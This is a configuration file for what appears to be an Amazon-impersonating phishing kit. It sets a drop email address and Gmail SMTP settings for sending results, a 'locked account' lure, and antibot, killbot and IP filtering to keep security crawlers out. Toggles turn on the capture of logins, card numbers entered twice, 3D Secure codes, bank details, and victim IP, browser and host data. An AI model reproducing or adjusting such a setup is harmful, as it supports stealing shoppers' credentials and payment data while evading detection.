;;Amazon - v2.0 
;; UPDATED CONFIG DATE : Tue, 2021-05-18 00:10

email_result = "yourresult@email.com" 
parameter = "ryu" 
default_lang = "en" 
case = "locked" 
blocked_page = "403" 
antibot = "" 
ipstack = "" 
killbot = "" 
send_method = "mail" 
one_time = "0" 
send_login = "0" 
double_card = "1" 
3dsecure = "0" 
pap = "1" 
email_login = "0" 
bank = "1" 
lock_lang = "1" 
ip = "1" 
agent = "1" 
host = "1" 
isp = "0" 
proxy = "0" 
smtp_hostname = "smtp.gmail.com" 
smtp_port = "587" 
smtp_username = "##" 
smtp_password = "##" 
smtp_secure = "TLS" 
